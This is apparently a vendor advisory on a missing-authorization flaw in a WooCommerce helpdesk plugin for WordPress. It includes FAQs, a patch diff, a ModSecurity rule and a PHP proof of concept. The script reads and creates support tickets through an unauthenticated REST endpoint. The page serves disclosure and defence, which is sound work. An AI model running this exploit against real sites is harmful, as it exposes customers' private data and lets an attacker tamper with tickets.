What is CVE-2026-23977?

CVE-2026-23977 is a medium severity security vulnerability in the Helpdesk Support Ticket System for WooCommerce plugin for WordPress. It allows unauthenticated attackers to perform unauthorized actions due to a missing capability check on a REST API endpoint.

How does the vulnerability work?

The vulnerability arises from improper access control on the ‘stsw_tickets’ custom post type’s REST API endpoint. Attackers can send unauthenticated HTTP requests to this endpoint to read, create, or modify support tickets without any authorization.

Who is affected by this vulnerability?

Any WordPress site using the Helpdesk Support Ticket System for WooCommerce plugin version 2.1.2 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the Helpdesk Support Ticket System for WooCommerce plugin. If the version is 2.1.2 or lower, your site is at risk.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the Helpdesk Support Ticket System for WooCommerce plugin to version 2.1.3 or later, where the vulnerability has been patched. Ensure that you regularly check for updates to keep your site secure.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium level of severity, suggesting that while the vulnerability can lead to unauthorized access, it requires specific conditions for exploitation. Administrators should prioritize addressing it to prevent potential data breaches.

What risks are associated with this vulnerability?

Exploitation of this vulnerability can allow attackers to read, create, modify, or delete support tickets, leading to unauthorized access to sensitive customer data. This could disrupt business operations and compromise customer privacy.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can make GET and POST requests to the exposed REST API endpoint without authentication. It illustrates the ease of accessing and manipulating ticket data, highlighting the practical implications of the vulnerability.

What changes were made in the patched version?

In version 2.1.3, the plugin developers disabled REST API access by setting ‘show_in_rest’ to false and removing the ‘rest_base’ parameter. Additionally, ‘publicly_queryable’ was set to false, eliminating the exposure of the REST API endpoint.

Can I disable the plugin instead of updating?

While disabling the plugin can temporarily mitigate the risk, it is not a long-term solution. It is advisable to update to the patched version to ensure continued functionality and security.

What if I cannot update immediately?

If immediate updating is not possible, consider restricting access to the REST API endpoint through server configurations or firewall rules. However, these measures are not substitutes for applying the official patch as soon as possible.

Where can I find more information about this vulnerability?

For more detailed information about CVE-2026-23977, you can refer to the official CVE database or the security advisory from the plugin developers. Staying informed through security forums and WordPress community updates is also recommended.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-23977: Helpdesk Support Ticket System for WooCommerce <= 2.1.2 – Missing Authorization (support-ticket-system-for-woocommerce)

CVE ID CVE-2026-23977

Plugin support-ticket-system-for-woocommerce

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.1.2

Patched Version 2.1.3

Disclosed March 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-23977:
The Helpdesk Support Ticket System for WooCommerce WordPress plugin, versions up to and including 2.1.2, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to perform unauthorized actions via the plugin’s REST API endpoint. The CVSS score of 5.3 reflects a medium severity impact.

Atomic Edge research identifies the root cause as improper access control on the custom post type’s REST API endpoint. The vulnerable code in /support-ticket-system-for-woocommerce/includes.php at lines 200-210 registers the ‘stsw_tickets’ custom post type with ‘show_in_rest’ set to true and ‘rest_base’ set to ‘stsw_tickets’. This configuration exposes the WordPress REST API endpoint /wp-json/wp/v2/stsw_tickets without implementing any capability checks. The ‘publicly_queryable’ parameter is also set to true, allowing direct queries.

The exploitation method involves unauthenticated HTTP requests to the exposed REST API endpoint. Attackers can send GET requests to /wp-json/wp/v2/stsw_tickets to retrieve ticket data. They can also send POST requests to create new tickets or PUT/PATCH requests to modify existing tickets. No authentication or authorization tokens are required. The attack vector uses standard WordPress REST API conventions with JSON payloads containing ticket parameters like title, content, and status.

The patch in version 2.1.3 addresses the vulnerability by disabling REST API access entirely. The diff shows two critical changes in /support-ticket-system-for-woocommerce/includes.php. First, ‘show_in_rest’ is changed from true to false. Second, the ‘rest_base’ and ‘rest_controller_class’ parameters are completely removed. Additionally, ‘publicly_queryable’ is changed from true to false, preventing direct querying of the post type. These changes eliminate the unauthorized access vector by removing the REST API endpoint exposure.

Successful exploitation allows unauthenticated attackers to read, create, modify, and potentially delete support tickets. This constitutes unauthorized access to sensitive customer support data, including potentially private customer communications, order details, and personal information. Attackers could also manipulate ticket status, close legitimate support requests, or create fraudulent tickets to disrupt business operations.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/support-ticket-system-for-woocommerce/includes.php
+++ b/support-ticket-system-for-woocommerce/includes.php
@@ -2,7 +2,7 @@
 /**
  * Helpdesk Support Ticket System for WooCommerce - STSWooCommerceInc Class
  *
- * @version 2.1.2
+ * @version 2.1.3
  *
  * @author  WPFactory
  */
@@ -174,7 +174,7 @@
 	/**
 	 * Tickets.
 	 *
-	 * @version 2.0.0
+	 * @version 2.1.3
 	 */
 	public function Tickets() {

@@ -200,14 +200,12 @@
 				'description'           => esc_html__('Adding and editing my Tickets','support-ticket-system-for-woocommerce' ),
 				'menu_icon'             => 'dashicons-calendar',
 				'supports'              => array( 'title'),
-				'show_in_rest'          => true,
-				'rest_base'             => 'stsw_tickets',
-				'rest_controller_class' => 'WP_REST_Posts_Controller',
+				'show_in_rest'          => false,
 				'capability_type'       => 'page',
 				'hierarchical'          => false,
 				'menu_position'         => null,
 				'public'                => false, // it's not public, it shouldn't have it's own permalink, and so on
-				'publicly_queryable'    => true,  // you should be able to query it
+				'publicly_queryable'    => false,
 				'show_ui'               => true,  // you should be able to edit it in wp-admin
 				'show_in_menu'          => false,
 				'exclude_from_search'   => true,  // you should exclude it from search results
--- a/support-ticket-system-for-woocommerce/support-ticket-system-for-woocommerce.php
+++ b/support-ticket-system-for-woocommerce/support-ticket-system-for-woocommerce.php
@@ -3,7 +3,7 @@
  * Plugin Name: Helpdesk Support Ticket System for WooCommerce
  * Description: WordPress ticket system - Manage customer queries and issues on your WordPress eShop with helpdesk WooCommerce support ticket system.
  * Plugin URI: https://extend-wp.com/support-ticket-system-for-woocommerce
- * Version: 2.1.2
+ * Version: 2.1.3
  * Author: WPFactory
  * Author URI: https://wpfactory.com
  * Text Domain: support-ticket-system-for-woocommerce
@@ -14,12 +14,12 @@
  * License: GPLv2 or later
  * License URI: http://www.gnu.org/licenses/gpl-2.0.html
  * Created On: 09-10-2019
- * Updated On: 25-12-2025
+ * Updated On: 14-01-2026
  */

 defined( 'ABSPATH' ) || exit;

-defined( 'WPFACTORY_WC_STS_VERSION' ) || define( 'WPFACTORY_WC_STS_VERSION', '2.1.2' );
+defined( 'WPFACTORY_WC_STS_VERSION' ) || define( 'WPFACTORY_WC_STS_VERSION', '2.1.3' );

 defined( 'WPFACTORY_WC_STS_FILE' ) || define( 'WPFACTORY_WC_STS_FILE', __FILE__ );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-23977
SecRule REQUEST_URI "@rx ^/wp-json/wp/v2/stsw_tickets" 
  "id:100023977,phase:2,deny,status:403,msg:'CVE-2026-23977 - Unauthorized access to Helpdesk Support Ticket System REST API',severity:'CRITICAL',tag:'CVE-2026-23977',tag:'WordPress',tag:'Plugin',tag:'WooCommerce',tag:'Missing_Authorization'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-23977 - Helpdesk Support Ticket System for WooCommerce <= 2.1.2 - Missing Authorization

<?php

$target_url = 'https://example.com'; // Change to target WordPress site

// Exploit the exposed REST API endpoint for stsw_tickets custom post type
$api_endpoint = $target_url . '/wp-json/wp/v2/stsw_tickets';

// Test 1: List all tickets (GET request)
echo "[+] Testing GET request to list tickets...n";
$ch = curl_init($api_endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Status: $http_coden";
echo "Response: $responsenn";

// Test 2: Create a new ticket (POST request) if GET was successful
if ($http_code == 200) {
    echo "[+] Testing POST request to create ticket...n";
    $payload = json_encode([
        'title' => 'Atomic Edge Test Ticket',
        'content' => 'This ticket was created via unauthorized REST API access.',
        'status' => 'publish'
    ]);
    
    $ch = curl_init($api_endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/json',
        'Content-Length: ' . strlen($payload)
    ]);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo "HTTP Status: $http_coden";
    echo "Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-23977?
Overview of the vulnerability
CVE-2026-23977 is a medium severity security vulnerability in the Helpdesk Support Ticket System for WooCommerce plugin for WordPress. It allows unauthenticated attackers to perform unauthorized actions due to a missing capability check on a REST API endpoint.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from improper access control on the ‘stsw_tickets’ custom post type’s REST API endpoint. Attackers can send unauthenticated HTTP requests to this endpoint to read, create, or modify support tickets without any authorization.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Helpdesk Support Ticket System for WooCommerce plugin version 2.1.2 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the Helpdesk Support Ticket System for WooCommerce plugin. If the version is 2.1.2 or lower, your site is at risk.
What should I do to fix this vulnerability?
Steps for remediation
To mitigate this vulnerability, update the Helpdesk Support Ticket System for WooCommerce plugin to version 2.1.3 or later, where the vulnerability has been patched. Ensure that you regularly check for updates to keep your site secure.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium level of severity, suggesting that while the vulnerability can lead to unauthorized access, it requires specific conditions for exploitation. Administrators should prioritize addressing it to prevent potential data breaches.
What risks are associated with this vulnerability?
Potential impacts of exploitation
Exploitation of this vulnerability can allow attackers to read, create, modify, or delete support tickets, leading to unauthorized access to sensitive customer data. This could disrupt business operations and compromise customer privacy.
How does the proof of concept demonstrate the issue?
Exploit demonstration details
The proof of concept provided shows how an attacker can make GET and POST requests to the exposed REST API endpoint without authentication. It illustrates the ease of accessing and manipulating ticket data, highlighting the practical implications of the vulnerability.
What changes were made in the patched version?
Details of the fix in version 2.1.3
In version 2.1.3, the plugin developers disabled REST API access by setting ‘show_in_rest’ to false and removing the ‘rest_base’ parameter. Additionally, ‘publicly_queryable’ was set to false, eliminating the exposure of the REST API endpoint.
Can I disable the plugin instead of updating?
Considerations for disabling the plugin
While disabling the plugin can temporarily mitigate the risk, it is not a long-term solution. It is advisable to update to the patched version to ensure continued functionality and security.
What if I cannot update immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider restricting access to the REST API endpoint through server configurations or firewall rules. However, these measures are not substitutes for applying the official patch as soon as possible.
Where can I find more information about this vulnerability?
Additional resources
For more detailed information about CVE-2026-23977, you can refer to the official CVE database or the security advisory from the plugin developers. Staying informed through security forums and WordPress community updates is also recommended.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations